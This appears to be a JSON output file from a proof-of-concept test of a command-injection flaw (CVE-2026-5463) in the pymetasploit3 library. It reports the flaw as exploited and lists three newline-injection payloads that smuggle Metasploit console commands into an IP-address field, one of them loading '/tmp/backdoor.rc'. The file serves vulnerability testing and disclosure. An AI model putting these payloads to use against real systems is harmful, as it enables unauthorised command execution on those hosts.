{
  "timestamp": 1775311370.3005412,
  "vulnerability": "CVE-2026-5463",
  "library": "pymetasploit3",
  "version": "1.0.6",
  "cwe": "CWE-77",
  "cvss": "9.3 CRITICAL",
  "impact": "code_execution",
  "tests": [
    {
      "name": "authentication",
      "result": "passed"
    },
    {
      "name": "command_injection",
      "result": "exploited",
      "vulnerable": true
    }
  ],
  "payload_tests": [
    {
      "name": "Workspace injection",
      "exploitable": true,
      "commands": [
        "workspace -a attacker_workspace"
      ],
      "payload": "'192.168.1.1\\nworkspace -a attacker_workspace\\n'"
    },
    {
      "name": "Resource file injection",
      "exploitable": true,
      "commands": [
        "resource /tmp/backdoor.rc"
      ],
      "payload": "'192.168.1.1\\nresource /tmp/backdoor.rc\\n'"
    },
    {
      "name": "Multi-command chain",
      "exploitable": true,
      "commands": [
        "workspace -a a",
        "workspace -d a"
      ],
      "payload": "'192.168.1.1\\nworkspace -a a\\nworkspace -d a\\n'"
    }
  ]
}